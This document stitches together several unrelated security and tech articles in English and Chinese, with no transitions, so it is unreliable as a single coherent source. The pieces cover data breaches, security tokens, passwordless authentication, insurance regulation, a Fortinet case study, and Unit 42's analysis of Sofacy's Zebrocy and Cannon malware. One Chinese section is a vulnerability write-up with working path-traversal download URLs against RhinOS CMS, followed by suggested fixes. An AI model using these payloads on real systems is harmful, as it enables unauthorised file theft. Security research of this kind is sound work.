In technology, quite a few companies are doing well. In fact, it’s a regular race among Apple and Microsoft to see who’s the world’s more valuable company. However, quite a few other companies in other industries are also doing very well. Many have reported strong earnings in the last couple years. Many of those same companies have had data breaches.

I saw this tweet from Buck Woody , which says ” Another day, another breach. C’mon companies, get your act together. Spend a bit of that record profit on security. We’re tired of this.”

I agree. As someone who’s stayed at an SPG hotel, I’d guess my data has been leaked. I’m also guessing that my credit card has been changed since then, since I think I end up changing them once a year because of some data breach. Still, I think that shouldn’t be a habit I have.

Companies need to spend more than “a bit” on security. They need to better train their IT staff on secure coding and configuration as well as on tools to support those habits and processes. They also need to devote some time and money to fixing past security issues. No system should be immune from patching because of fears that an application stops working. Either internal developers need to test better, or vendor contracts need to specify that software purchased will support platform security patches, which often means the vendors need to ensure that service packs and patches don’t break their products.

We need to demand more as consumers and technical people, including demanding more of ourselves. Building secure systems is hard. Writing secure code requires we change habits and sometimes do a bit more work. It’s something we all need to learn to do better.

Steve Jones

Listen to the MP3 Audio ( 3.2MB) podcast or subscribe to the feed at iTunes and Libsyn .

ICO market passed and crypto community preparing for new Era ― Digital Securities Offering or simply STO. The amount of funds raised through ICO is less than $270m in November. This might be a sign that people don’t trust ICOs anymore. The next big stage of Blockchain is Security Tokens approved by regulators and more secure for investors. But for now it’s not so clear how new platforms will work, what exchanges will better adapt to to Security Tokens, and whether there will be a common Security Token standard approved by SEC and used by each project. There are more than 40 STO platforms for now, but most of them have some issues: in token standard, in platform, in features etc. So let’s look at them.

Most of standards allow investors and issuers to recover their accounts after losing private keys. In case of investor tokens will be transferred to his new address: some standards will do it by burning tokens from his previous address and minting to the new, some standards have managers or regulators, who will transfer it from his previous address to the new. In case of issuer it’s not so simple, because token may be tradable on the Exchange when the loss occurs and reissuance of new tokens will come as extra work for exchanges too. The bigger challenge occurs when issuers’ private key will be stolen, because unlike ICOs here issuer has more rights and power, like access to cap table, in some standards also access to transferring tokens from investor addresses or to changing regulator contracts and managers. Using these rights hackers may create chaos that then it will not work again to reissue tokens.

Investors could be from different jurisdictions and could be situation that this jurisdiction will have different set of overlapping transfer restrictions. The common decision is issuing several tokens for each type of investors, but creating several whitelists with different restrictions and using it in one token is better.

Issuer of Security Token has lot of rights and sometimes it goes beyond the allowed. For example in Atomic Capitals’ AtomicDSS token standard there is a function forceTransfer that allows the issuer(in this case owner) to transfer tokens to any address without checking restrictions .

Using Ethereum for Security tokens could be a bad decision because of high transaction costs. Centralised exchanges are not the best place for trading security tokens because the whole trade history will be stored off-chain and it’s not as secure as saving it on chain. Now most of the platforms working on making SEC-compliant smart contracts. Market will need new Blockchain for security tokens, with low transaction fees, fast transactions, built in KYC/AML, etc.

If you are an investor and want to participate in STOs you will need to pass KYC for each asset. Now only few platforms think about doing one big investors registry on-chain and it should resolve the problem for investors of going through KYC process multiple times before each STO. Also it will be useful gives each investor an ID which connects to his info on-chain and gives ability for attracting few addresses for one ID in case investor wants to use different addresses for each STO he participates.

STO market will not be the same as ICO market, it’ll be more secure for investors. But for now there are lot of projects from ICOs market trying to adapt to STOs market with having nothing related to Security Tokens. The main problem of cryptocurrency market ― Investors who ready to stupidly give all their money for projects without learning any details of this project. We need more clever investors and more trustful projects.

Opinions expressed by Entrepreneur contributors are their own.

You're reading Entrepreneur India, an international franchise of Entrepreneur Media.

Just flip through any newspaper and with all surety you will come across the huge sum of money being siphoned in a newer kind of cyber-attack. According to the Indian Computer Emergency Response Team (CERT-In), 27482 cases of cybercrime were reported in a span of 6 months in 2018. As more people are going online, the cybercrime rate through phishing, probing, virus, malicious code and ransomware have become the major modus-operandi of cyber attackers.

Do the increase in losses and cyber-crime rate necessitate the implementation of expensive cybersecurity systems? Some companies do not have access to proper knowledge; others find the installation of cyber-safety too expensive. “With a plethora of topics, adequate funds and staff, the installation of cybersecurity systems are more of a headache,” says Sakun Aggarwal, Managing Director of Krishna Brickworks, who seems to be satisfied with secured passwords for all his data and records.

However, losses in terms of millions of dollars and loss of private information of employees, ransom demand to unlock files and various other malpractices are rising significantly. Ransomware payments hit USD 2 billion in 2017, twice as much as in 2016, according to Bitdefender antivirus software firm. Likewise, the cybercrime at Equifax (EFX), one of the largest credit bureaus, where personal data of 145 million people was stolen, cannot be ignored. The situation is alarming. Hence, the need to prioritize cybersecurity becomes predominant in today’s times.

By definition, cybersecurity means the techniques and processes of protecting the computers, data and programs from unauthorized access and misuse which can lead to exploitation. The intruders begin from a lesser protected system and gradually move up to more confidential and critical information undeterred, posing a threat to the entire system. Know-how as to how manipulation can happen and the steps needed to prevent vulnerability is mandatory and highlighted in following points:

1. Establish secure passwords and antivirus tools

Mechanisms like emails attachment scanner, strong authentication and stronger passwords have become the first step of the security measurements. The passwords shouldn't be easily guessable. They should be unique.Ramneet Kaur, COO of Rapid Skillz says, “Avoid using passwords with birth dates and family names. Else it becomes quite predictable and easy to guess. Use specialized skill to strengthen your passwords and secure all data.”

2. Employee training

The employees should be educated and trained against all human vulnerabilities and guided that phishing is a common scam. The attachments with emails cannot be locked and thus, should be opened only if the employees are certain of the sender. They should avoid clicking any pop-ups that flash on the screen.

3. Steps to reduce access to information

Easy access to any kind of information should be protected. Various software like proxy testing programs, encryption software, Virtual Private Number (VPN) and reliable security software should be installed.

Vimal Gupta, CEO of New Idea Farm Equipment Company says, “After having been duped by a fake bank call asking for the credit card number and its details, later misusing it for their personal use; we have become wary of the vulnerability around. We have installed Kaspersky software and become cautious of any fraudulent practices that are possible.”

4. Updating is the key

Professionals should be appointed to check intrusion at regular intervals and to tab any lacuna possible by human error. The system has to be updated every now and then. Keep a note of the latest pitfalls and mistakes that are causing severe monetary losses and steps being undertaken to prevent future fallacies globally.

Arpit Jain, Founder of Promatics Information Technology suggests, “It is advisable to devise a continual back-up to prevent any fallacy and easy restoration of valuable data in case of adversity. The institute should be safely guarded against any cyber-crime possible as data is the crux of all information.”

The bottom line:

Cybersecurity is an ongoing phase. It is undoubtedly expensive but with the increase in techniques and pace of cyber-crime, installation of the mechanism is much better than repentance later. One can always begin with free cyber-security options and gradually prioritize the digital data security. In the age of digitalization, the digital data is becoming the crux of all information and hence it has to be protected against any malpractices.

Passwords are antiquated and insecure. It’s time to eliminate them altogether. Experts from FIDO explain how to enable authentication without passwords.

The original version of this post was published in Forbes .

Last week it wasn’t just, as has become depressingly common, “another day, another data breach.” It was breaches that generated debates over passwords. Which provided yet more evidence that it is past time to make them extinct―since they make all of us users an endangered species.

The first came courtesy of Quora, probably the most popular Q&A site on the web. The company posted a notice of a “compromise” that affected more than 100 million registered users―an estimated third of its monthly user base.

As CEO Adam D’Angelo put it, “We recently discovered that some user data was compromised as a result of unauthorized access to one of our systems by a malicious third party.”

The other came from Citrix Systems, which forced a password reset for users of its ShareFile content collaboration service to head off what company CISO Stan Black said was not a breach of ShareFile itself, but evidence of “credential stuffing,” where hackers who have stolen emails or passwords through other breaches try to use those credentials on other sites.

Which should never happen, of course, since we are all told constantly never to use the same password for multiple sites. But, as we all know, it does happen since just about everybody does exactly that.

And it illustrates once again what numerous security experts have been saying for years: Passwords are a lousy―really lousy―way to secure anything online, especially when there are now alternatives that are much better and yes, even easier.

In the case of the Quora breach, much of the speculation was about the level of encryption for the passwords.

Multiple outlets reported that D’Angelo had first written in his blog post that the passwords were simply “hashed with a salt that varies for each user,” but after critics pointed out that a simple hash wouldn’t offer much protection, D’Angelo’s revised post said the passwords had been “hashed using bcrypt,” which would make cracking them much more difficult.

Still, D’Angelo noted that “it is generally a best practice not to reuse the same password across multiple services, and we recommend that people change their passwords if they are doing so.”

In the case of Citrix, Black’s declaration that “We moved quickly and decisively to end (a credential-stuffing attack) for the benefit of our users,” along with a notice that the company will be “incorporating a regularly scheduled forced password reset into our normal operating procedures,” got some major blowback from users who weren’t feeling the benefit.

They noted that it is no longer considered best practice to change passwords for no reason other than that a few months have gone by.

In the comments section of Black’s post, one user wrote, “My password is securely stored in LastPass. It’s a 16-character indecipherable mass of gibberish that is unique to this site. Don’t punish me for the bad security practices of other users by forcing me to reset it on a regular basis.”

“Not to mention, forced password resets were deprecated as a best practice by NIST over two years ago.”

Indeed, that advice has been coming from more than NIST (National Institute of Standards and Technology). In March 2016, Lorrie Cranor, then chief technologist of the Federal Trade Commission (FTC), declared in a blog post that it was “time to rethink mandatory password changes .”

And security guru, author, blogger, and CTO of IBM Resilient Systems Bruce Schneier took extreme issue with a recent column in USA Today that recommended changing passwords every six months.

“No, no no―a thousand times no,” he wrote on his blog .

The reason? As experts have been saying for years, when people are forced to change their passwords regularly, they tend to use weaker ones. They make small changes to the old ones, which ends up making security weaker, not stronger.

But such squabbles wouldn’t be necessary if we weren’t using an authentication method that is demonstrably broken. Which is why numerous experts have called for eliminating passwords―the FIDO (Fast IDentity Online) Alliance has been promoting that since 2012.

Phil Dunkelberger, CEO of Nok Nok Labs and a FIDO member, has said more than once that the username and password paradigm “was never designed for, and is inherently incapable of addressing, the use cases of modern society.”

Not just for technological reasons, of course. Users frequently make it ridiculously easy for attackers. As Nabil Hannan, managing principal at Synopsys, put it, passwords need to be obsolete because “they tend to be pretty weak or predictable, and people have a tendency to reuse the same password across different applications.”

And Brett McDowell, FIDO’s executive director, said even “strong passwords”―a phrase he labels an oxymoron―are no better, because “as long as the password is the key to get us into our accounts, users will be tricked into giving that password to the wrong party.”

Indeed, of the three most common authentication factors―something you know, something you have, and something you are―the weakest is something you know, since an effective phishing attack can trick a user into giving it away.

McDowell said even one-time passcodes (OTP) are failing “because they can simply be given to a remote attacker as easily as a password.”

He said there is now a move to a fourth factor―behavioral authentication or “something you do”―because many companies “know they have to protect themselves from users who already have the correct passwords to get into their accounts.”

The fundamental problem, he said, is an authentication system based on “shared secrets,” where things like passwords are known by both parties of a transaction.

As hacking events have increased in number and severity, we in the cybersecurity community have united around common strategies that all organizations can implement to reduce their risk. Universal best practices provide organizations with many useful tools to protect their businesses. But what often gets overlooked in these discussions are the unique security challenges that each industry faces, and the tailored solutions required to address those issues. This is an area of interest to me, and lately Ive been fascinated by the path that the insurance industry is carving out when it comes to cybersecurity. Today, Ill discuss recent activity by the U.S. insurance industry and the ramifications and impact of these initiatives. In future weeks, Ill offer my insights into how other industries are confronting rising security and compliance risks.

Before we dive in, let me provide a little context into why I think we should segment out insurance as an area of focus. While in many peoples minds, the insurance industry is considered simply a sub-sector of the financial services sectornothing could be further from the truth. For those not as familiar with these important nuances, its important to point out that the insurance market has its own business needs, technology requirements and adoption cycles, and buyer personas as compared to banking and capital markets. Products (security-related or otherwise) that might resonate with a banker or IT professional in banking may not be relevant to an insurance buyer, just as products that the insurance buyer finds valuable may not appeal to the banking and capital markets. Its therefore imperative that we take stock of the insurance markets efforts and endeavors when it comes to protecting insurers, their customers, and their data.

Aligning behind a cybersecurity framework in a fragmented, state-by-state regulatory environment

In the last few years, the U.S. insurance industry has taken several steps to work on cyber issues. The most obvious example is the recent moves by the National Association of Insurance Commissioners (NAIC) to promote their Insurance Data Security Model Law . This model legislation establishes a legal framework to guide state governments as they consider enacting laws to require insurance companies to implement cybersecurity protections. In general, the NAIC has become more outspoken on cybersecurity issues (see, for example, their 2015 Cybersecurity Bill of Rights ) and has been working to ensure a consistent approach within the U.S. market.

If we look at these various activities, a few key points emerge that I think are valuable and worth keeping track of in the coming months:

The state-by-state adoption of laws that are similar to or overlapping with the NAIC Insurance Data Security Model Law will continue at an unpredictable pace. As of this writing, over a half dozen states are debating these rules and determining the best way to apply the NAICs law while also weaving in coverage from the 2017 Cybersecurity Regulation from the New York Department of Financial Services (which overlaps significantly with the NAIC law). And as we move into a post-GDPR world and consider the California Consumer Privacy Act from this past June, it will be intriguing to see how insurers and banks take their cues from one another and also continue to promulgate laws unique to their own industry needs. If you are interested in staying current on these issues, you can monitor the NAIC website . And look out for future blogs from me where Ill discuss other industries dealing with cybersecurity and compliance challenges.

The post The challenges of adopting a consistent cybersecurity framework in the insurance industry appeared first on Microsoft Secure .

*** This is a Security Bloggers Network syndicated blog from Microsoft Secure authored byJoram Borenstein. Read the original post at: https://cloudblogs.microsoft.com/microsoftsecure/2018/12/20/the-challenges-of-adopting-a-consistent-cybersecurity-framework-in-the-insurance-industry/

RhinOS是一个使用最新功能开发网站的框架，可以为Web门户提供最快的访问和管理。RhinOS CMS对于网站管理功能十分强劲，内置允许使用数据库进程和解析器模块快速访问数据库，xml和其他资源，购物车，标签和参数化文件，配置参数，Intranet访问，数据库会话，电子邮件发送，验证码安全系统，快速过滤，列表和详细信息的模块，功能可谓是非常之多了。RhinOS CMS的download.php文件存在任意文件下载漏洞，通过漏洞能够下载任意的文件。

RhinOS CMS 下载地址为：https://sourceforge.net/projects/rhinos/。下载完成后，打开文件，一直点下一步就能够完成安装，如图1所示。

图1 完成安装

由于一些编码原因，安装成功后的的信息会显示一些乱码，如果使用西班牙语的系统就能正常显示了。然后需要将httpd.conf中的端口修改为8080端口，修改端口是为了避免和windows本身一些服务冲突，http.conf所在路径为：C:\rhinos\httpd\conf\httpd.conf。如图2所示。

图2 httpd.conf所在路径

右键编辑将文件中的80端口修改为8080端口，如图3所示。

图3 修改端口

修改端口后需要重启阿帕奇服务，重启服务后访问http://127.0.0.1:8080。就能够访问到已经搭建好的CMS了，如图4所示。

图4 重启阿帕奇服务后访问

漏洞存在于C:\rhinos\demo\admin\php\download.php中，在第30行代码，能够看到文件读取的路径拼接操作，如图5所示。

图5 download.php

看到getParam()，查找这个方法是如何实现的。

这个函数存在于：C:\rhinos\demo\admin\php\connect.php。第88行，如图6所示。

图6 connect.php

这个函数中获取了”file”的参数，通过POST或者GET提交都是可以的。然后根据图5所示第41行触发文件读取操作，如果控制参数file则能够成为任意文件读取漏洞或者为任意文件下载漏洞。

在复现之前需要找到从什么地方调用到了download.php,在经过测试之后发现通过这个URL提交就能够利用漏洞下载到config.php文件,但是首先需要登录后台。URL如下:http://127.0.0.1:8080/admin/inicio.php?include=php/download.php&name=efe.php&file=../config.php，如图7所示。

图7 下载config.php

当然既然是任意文件下来漏洞肯定可以下载windows目录下面的win.ini文件，使用URL为:http://127.0.0.1:8080/admin/inicio.php?include=php/download.php&name=efe.php&file=../../../../Windows/win.ini。执行后就能够下载文件了。如图8所示。

图8 下载win.ini

根据前文的描述能够看出，漏洞存在一定的危害。应该对于漏洞进行修复，关于如何去修复漏洞。

2)正则严格判断用户输入参数的格式，保证输入参数的准确性。

3)将下载区独立放在项目路径外，分配每个下载资源固定的URL，不能是所有的下载资源都是统一的URL：

http://127.0.0.1:8080/admin/inicio.php?include=php/download.php&name=efe.php&file=文件名

正如Palo Alto Networks公司旗下Unit 42威胁研究团队在 之前分析Cannon木马的文章 中所提到的那样，Sofacy组织（又名Fancy Bear、APT28、STRONTIUM、Pawn Storm、Sednit）在今年10月中旬到11月中旬期间一直在忙于攻击世界各地的各种政府和私人组织。虽然其大部分攻击目标都位于北约盟国，但也有少部分位于前苏联国家。所有这些攻击大都旨在传播Unit 42在 之前已经分析过的Zebrocy木马变种 ，但 ESET的报告 显示，其中一些恶意文档也传播了Cannon或Zebrocy Delphi变种。自2015年年中开始追踪Zebrocy的使用情况以来，Unit 42发现该木马的使用率一直呈上升趋势。相比其他与Sofacy组织相关的后门工具，Zebrocy在攻击行动中的使用率明显要高得多。

Unit 42最近分析的所有攻击都有一个共同点――恶意文档使用的都是同一个作者名称：Joohn。最初引起Unit 42注意的恶意文档样本被命名为“crash list(Lion Air Boeing 737).docx”，旨在传播Zebrocy木马。通过利用AutoFocus威胁情报平台，以及从VirusTotal收集到的数据，Unit 42基于这份文档的元数据和行为发现了Cannon木马，以及其他更多的恶意文档、payload和攻击目标。

需要说明的是，所有这些攻击的初始攻击媒介几乎全都是鱼叉式网络钓鱼电子邮件。另外，攻击使用的都是注册到合法电子邮件服务提供商的电子邮件帐户，而不是被黑的账户。这些帐户的名称看上去与合法政府组织的名称或其他受信任的第三方实体的名称十分相似。

此外，所有这些恶意文档在功能上几乎完全相同――利用Microsoft Word的远程模板下载功能从第一阶段C2检索恶意宏，加载并执行初始payload。大多数恶意文档都不包含任何文字内容，仅包含一张通用的诱饵图片，以诱使收件人启用宏。从这一点来看，攻击者似乎主要是想通过文件名来吸引受害者，而不是文档的内容。

总的来说，Unit 42在2018年10月17日到2018年11月15日期间共捕获了9份不同的恶意文档，它们都使用了相同作者名（即Joohn），旨在传播Zebrocy或Cannon变种。Unit 42收集到的数据显示，Dear Joohn行动的攻击目标横跨四大洲，从联邦层面的政府机构到地方政府机构。

此外，Unit 42还利用收集到的数据创建了Dear Joohn行动的时间表，从而能够更加清晰地展示Sofacy组织是在何时向他们的目标发起了攻击，以及他们是如何利用自动化工具来实施攻击的。

从10月17日开始，Unit 42一共捕获到了9份不同的恶意文档，它们被发送给了位于世界各地的多个组织。具体来说，攻击目标包括一个北美外交事务组织、几个欧洲外交事务组织以及几个前苏联国家政府实体。更多的证据表明，此次行动可能还针对了世界各地的执法机构，包括北美、澳大利亚和欧洲。另外，Unit 42的遥测数据还显示，此次行动有可能也针对了一些非政府组织、营销公司以及医疗行业的组织。所有这些攻击的攻击媒介都是鱼叉式网络钓鱼电子邮件，且使用的都是注册到免费电子邮件服务提供商Seznam的电子邮件帐户。这里需要说明一下的是，Seznam是一家位于捷克的合法电子邮件服务提供商。图1展示的是一封钓鱼电子邮件示例。

图1.在Dear Joohn行动中发送的鱼叉式网络钓鱼电子邮件示例

在此次行动中，Sofacy组织似乎主要是想通过文件名来吸引受害者。文档的名称包括英国脱欧（Brexit）、狮航客机坠毁，以及最近在以色列发生的火箭袭击（完整的恶意文档列表见表1）。虽然文档名称似乎透露出攻击具有高度针对性，但文档的实际内容却大体一致，都仅包含一张通用的诱饵图片，如图2所示。

图2.通用的诱饵图片

到了11月份，Sofacy组织改变了其战术，开始为他们的恶意文档使用不同的诱饵内容。在这个月，Unit 42一共捕获到了三份针对北约盟国的恶意文档样本，它们的内容均不相同，如图3所示。

图3.有针对性的诱饵内容

其中一份文档向收件人展示的内容是模糊不清的，但可以很明显地看到北约爆炸军械处理小组（EOD）的印章。实际上，恶意文档所包含的内容仍然仅是一张图片，只是经过了模糊处理，上面的内容与一个北约研讨会议有关。另外两份文档彼此之间非常相似，向收件人展示的内容都是一堆乱码，以及有关如何正确查看文档的说明。有趣的是，其中一份文档中的说明是采用俄文编写的，这可能表明其攻击目标位于一个讲俄语的国家。

无论实际内容如何，所有恶意文档均使用了相同的策略来实施攻击。在被打开之后，恶意文档首先会利用Microsoft Word自带的功能来尝试下载一个远程模板，然后加载恶意宏，如图4所示。

图4.Microsoft Word尝试下载远程模板

如果C2服务器在文档被打开时处于开启状态，那么下载将会成功，而恶意宏将被加载到同一Microsoft Word会话中。然后，收件人将看到一个“Enable Content（启用内容）”提示，如图5所示。但如果C2服务器处于关闭状态，那么下载将会失败，收件人将不会看到“Enable Content（启用内容）”提示，因为没有宏被下载。”

图5.下载的远程模板，提示收件人单击“Enable Content”以运行宏

Unit 42在10月和11月期间捕获的所有恶意文档都存在大量相似之处（如表1所示），这使得Unit 42可以将这些攻击联系起来。其中最明显的相似之处就是，文档作者的名字都是Joohn。不过，这种相似性在11月份出现了一个细微的偏差。虽然Unit 42在该月捕获的三个样本仍然使用了Joohn这个名字，但它仅作为“最后一次保存者”出现，而“作者”属性改为了使用默认的“USER/user”。

表1.出现在Dear Joohn行动中的恶意文档

此外，由表1中的恶意文档下载的远程模板也使用了相同的作者名称：xxx，如表2所示（想要查看完整的散列值和元数据，请戳 这里 ）。

表2.Dear Joohn恶意文档下载的远程模板

如表1所示，恶意文档分别从四台不同的C2服务器下载对应的远程模板，服务器的IP地址如下：

这些初始C2 服务器IP地址不仅托管了会在随后加载第一阶段Zebrocy或Cannon payload的远程模板，而且还托管了第一阶段payload的C2服务器。在Dear Joohn行动中使用的所有C2服务器都基于IP，并且基础设施与早前的Zebrocy或Sofacy基础设施之间不存在任何重叠或关联。Dear Joohn行动的基础设施网络如图6所示。

图6.Dear Joohn行动的基础设施网络

Unit 42根据收集的数据创建了Dear Joohn行动的时间表（基于表3中的时间戳），且发现攻击主要集中在10月中下旬和11月中旬，如图7所示。

表3.恶意文档的时间戳（所有时间均为UTC）

图7.Dear Joohn行动时间表

从时间戳来看，最初的四份恶意文档是在2018年9月11日04:22同时被创建的，并在2018年10月13日08:21同时被修改。四份恶意文档在完全相同的时间被创建并修改，但却被嵌入了三个不同的C2地址，这可能表明攻击者使用了某种自动化工具。我们都知道，这可以通过使用基于命令行的渗透测试工具包来实现。比如Phishery，它就允许我们通过一个简单的脚本，以不同的输入同时生成多个文档。总的来说，这四份文档从最初创建到用于攻击的平均时间间隔为46天。随着时间的推移，Dear Joohn行动的节奏明显加快，从文件的创建到用于攻击的平均时间间隔下降到了大约两天。

如上所述，出现在Dear Joohn行动中的恶意文档会下载一个远程模板，包含在其中的恶意宏被用于安装第一阶段payload。除了Cannon之外，第一阶段payload几乎都是Zebrocy木马的变种。在此次行动中传播的Zebrocy变种由多种不同的语言编写而成，包括Delphi、C＃和VB.NET。表4列出了出现在Dear Joohn行动中的所有第一阶段payload的信息。

表4.出现在Dear Joohn行动中的第一阶段payload

值得注意的是，出现在Dear Joohn行动中的Zebrocy Delphi变种与Unit 42之前 在2018年6月有关Zebrocy的分析文章中 讨论的Delphi downloader非常相似。因此，这个Delphi变种应该算是一种已知的变种。但是，出现在此次行动中的C＃和VB.NET变种此前从未被报道过。需要指出的是，出现在此次行动中的所有Zebrocy Delphi变种均采用了UPX压缩，而其他变种都没有经过压缩。Unit 42推测，这很可能也正是因为Zebrocy Delphi变种作为一种已知变种已经被广泛分析的原因，Sofacy组织可能是想要通过对它进行压缩来增加逃过安全检测的机率。

通过对Cannon样本的收集和分析，Unit 42认为采用Delphi编写的Cannon也是一个全新的变种。鉴于我们已经看到Sofacy组织使用了多种语言来创建Zebrocy变种，因此该组织同样也有能力在多种编程语言中创建Cannon变种。

自Unit 42 发布有关Cannon的分析文章 以来，他们成功捕获了其他的一些Cannon样本，以便更好地了解它的起源。从目前看来，第一个已知的C＃ Cannon样本似乎是在2018年4月18日创建的，从那以后至少有7个样本被发布。表5展示了目前已知的所有C＃ Cannon样本、它们的编译时间以及用于C2通信的电子邮箱帐户。

表5.已知的C＃ Cannon样本

也正如Unit 42在最初的分析文章中所提到那样，C＃ Cannon能够使用POP3S登录到一个电子邮箱帐户，并检查具有特定文件名的电子邮件，该文件将被保存到目标系统并执行。需要指出的是，Unit 42最初分析的C＃ Cannon样本查找的是一个文件名为auddevc.txt的附件，但其他C＃ Cannon样本查找的是以下文件名：

在收集Cannon样本的过程中，Unit 42发现了另一类使用电子邮件来进行C2通信的Cannon变种。之所以将它与Cannon联系起来，是因为它使用了文件名“wmssl.exe”。实际上，它是由wmssl.txt附件转换而来的，用于安装和执行一个辅助payload。当然，仅凭这一点，是无法将它与Cannon完全联系起来，但在收集到了Delphi Cannon的其他样本之后，Unit 42发现了更多能够证明它们之间存在联系的证据。表6展示的是Unit 42收集到的所有Delphi Cannon样本，其中样本（SHA256：215f7c08c2 ..）与 ESET分析文章中 讨论的木马非常相似。

表6. Unit 42收集到的所有Delphi Cannon样本

已知最早的Delphi变种样本（SHA256：5a02d4e5f6 ...）为Unit 42提供了更多能够证明Delphi Cannon和Cannon之间存在联系的证据。例如，这个样本会将收集到的系统信息发送给C2，其中涉及到将正在运行进程的路径附加到header字符串Running place，而这个字符串也可以在C＃ Cannon样本（SHA256：4405cfbf28 ...）的inf函数中找到，如图8所示：

图8. C＃ Cannon的inf函数

在对比这两类Cannon变种的过程中，Unit 42在Delphi Cannon样本（SHA256：5a02d4e5f6 ...）中也发现了一个函数，它使用Running place和Logical_Drivers作为header字符串来将收集到的系统信息通过电子邮件发送给C2。虽然不完全匹配，但如图9所示，C＃ Cannon同样包含类似的header字符串，这使得Unit 42更加确信，这两类变种的确来自同一个木马家族：

图9. Delphi Cannon 和C＃ Cannon的相似之处

VB.NET Zebrocy变种（SHA256：e5aece694d ..）与其他已知的Zebrocy变种非常相似，它会将硬盘卷序列号包含在被它用作C2 beacon的URL中。需要说明的是，这个beacon是通过使用Scripting.FileSystemObject对象从存储在Environment.SpecialFolder.LocalApplicationData中的路径调用GetDriveName获得的。然后，它会使用从GetDriveName函数获取到的硬盘卷调用GetDrive，以获取硬盘的SerialNumber。接下来，这个VB.NET变种会通过运行以下命令来收集系统信息和正在运行的进程：

systeminfo & tasklist

用于将系统信息、正在运行的进程和屏幕截图发送到C2服务器的URL如下所示：

VB.NET Zebrocy变种通过将一个HTTP POST请求发送到上面的URL来传输收集到的数据，这些数据包含在HTTP POST请求中，其结构如下（注意：“＆”前后都有一个空格）：

C＃ Zebrocy变种在功能上与其他变种类似，但也有一些值得讨论的独有特性。与其他Zebrocy变种一样，C＃ Zebrocy变种会收集硬盘卷序列号，以用于C2服务器的出站beacon。具体来说，C＃ Zebrocy变种会使用windows API函数GetVolumeInformation来获取C盘的序列号。另外，这个变种还能够捕获屏幕截图，并以JPEG格式传输到C2服务器。

除了使用的编程语言之外，C＃ Zebrocy变种最显着的变化是收集系统信息和正在运行的进程的方式。具体来说，C＃ Zebrocy变种使用的是WMI查询来收集此类信息，而不是使用systeminfo和tasklist命令。具体的WMI查询列表如下所示：

用于将系统信息、正在运行的进程和屏幕截图发送到C2服务器的URL如下所示：

C＃ Zebrocy变种通过将一个HTTP POST请求发送到上面的URL来传输收集到的数据，这些数据包含在HTTP POST请求中，其结构如下：

Sofacy组织仍在继续使用类似的策略和技术来攻击全球各地的组织。Unit 42观察到，他们在10月底到11月期间通过鱼叉式网络钓鱼电子邮件实施了攻击，通常利用近期新闻事件作为文件名来诱使收件人打开恶意附件。在这些攻击中，该组织明显倾向于使用类似Zebrocy这样的简单downloader作为第一阶段payload。另一方面，该组织显然仍在继续对Zebrocy进行开发，并已经开发出了VB.NET和C＃版本。此外，他们在过去的攻击行动中似乎还使用了不同版本的Cannon。

声明：本文来自黑客视界，版权归作者所有。文章内容仅代表作者独立观点，不代表安全内参立场，转载目的在于传递更多信息。如需转载，请联系原作者获取授权。

Marella Cruises, operated by TUI UK&I, offers everything from all-inclusive trips to intimate adventures, and has a proud history of transporting passengers to over 200 destinations around the globe. With a company mission to help passengers discover their smile, Marella Cruises has many years of experience in the art of delivering great cruise-ship experiences, with a home-away-from-home atmosphere across its fleet of six ships.

Making the most of life on board

Much of this experience comes from a clear emphasis on customer service to make each trip as luxurious as possible. But in the modern world, there’s no escaping the need for digital connection, even in the middle of the Atlantic. To keep things running smoothly, network access has become an important part of life onboard cruise ships. With this in mind, Marella felt the time was right to ensure it had the right infrastructure in place to support its increasing need for connectivity.

Building the infrastructure for internet access has understandably always been a challenge for cruise ships, especially once the need for network security and the power to govern passenger usage is factored in. Historically, connectivity and intranet services onboard cruise ships have been patchy at best, due to the limitations of delivering this service while at sea. Marella therefore needed a robust network which could support heavy usage across its ships.

Marella also knew it could significantly enhance the customer experience by offering more digital engagement. With most people now using apps and websites to find information and book services in their everyday lives, developing an onboard app was a natural next step for improving Marella’s communications.

As such, Marella planned to launch a digital companion application, Navigate. This would help passengers maximise their onboard experience, enabling them to access information about ship schedules and entertainment, in addition to making bookings like spa treatments, excursions, and tables in Marella’s a la carte restaurants.

However, Marella also wanted to offer this with no app download, over a ship-wide ‘intranet’ as opposed to via customer Wi-Fi . This would encourage widespread adoption of the platform, minimising the hassle and cost for passengers. All of this needed to be achieved in a secure manner, giving Marella’s staff access to the network’s security features.

Creating connectivity at sea

Although Marella had a clear vision for the platform it wanted to deliver, this couldn’t be done without a robust infrastructure in place. In light of this, Fortinet and channel partner Tes Media needed to provide a flexible solution which would offer highly available coverage, even in difficult to cover areas of the ships.

To meet this demand, Fortinet and Tes Media worked closely with Marella to plan and execute a new connectivity strategy. This was deployed smoothly in a four-week window, using over 600 Fortinet AP Access Points , a number of FWC 500D Wireless Controllers, a Wireless Manager, and two FortiGate Firewalls . To date, Fortinet has provided three ships in Marella’s fleet with onboard internet and Firewall solutions, with another ship planned.

This has given Marella’s ships a fault-free, high density infrastructure, in addition to supporting the delivery of the new Navigate app. This has led to widespread adoption of this platform, as passengers are able to access the content and services within the app without needing to sign up for customer Wi-Fi.

Along with Tes Media, Fortinet has allowed TUI to make the most of its existing infrastructure and helped it to plan for its digital communication strategies moving forward. It has also given IT staff the platforms and tools they need to access and govern their systems, whether that’s viewing security threat data or controlling internet usage. Fortinet has enabled this ability and more, all on an easy-to-manage interface.

Reflecting on the deployment, Rowan Stallard, Electro-Technical Manager, TUI UK&I Marella Cruises said “Network access has become an important part of life onboard cruise ships. Fortinet has allowed TUI to make the most of its existing infrastructure and helped it to plan for its digital communication strategies moving forward.”

Find out more about how the Fortinet Security Fabric provides protection at the edge.

Despite regulatory mandates and years of costly data breaches in the healthcare industry, a recent survey found that less than one-third of healthcare organizations say they have a comprehensive cybersecurity program in place.

The 2018 CHIME HealthCare’s Most Wired survey found that only 29 percent of healthcare organizations have such a program in place. To make matters worse, 31 percent of those organizations that don’t have a program in place never meet with their executive committee or meet less than once a year.

For the survey, CHIME questioned 618 healthcare organizations.

The survey also found that healthcare organizations are getting away from building their own security programs from scratch and moving toward NIST and HITRUST frameworks. In addition to having a framework in place, CHIME determined that a comprehensive security program also includes having a dedicated senior security leader, an adequate security budget, governance and oversight committees, and regular meetings to determine and mitigate program gaps.

“Having a dedicated chief information security officer (CISO) and regularly reporting security updates to an executive committee are some of the first steps to mitigating cybersecurity vulnerabilities,” the report stated. “However, for most organizations, establishing these security foundations is still a work in progress. Only 29 percent of organizations report having a comprehensive security program in place,” The report stated.

